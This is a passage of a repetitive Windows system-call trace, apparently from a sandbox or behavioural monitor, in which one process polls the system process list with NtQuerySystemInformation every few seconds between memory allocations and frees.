BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.294] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.327] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.340] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.357] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.371] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.388] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.404] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.419] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.435] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.466] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.483] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.514] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.529] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.543] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.562] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.573] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.589] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.605] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 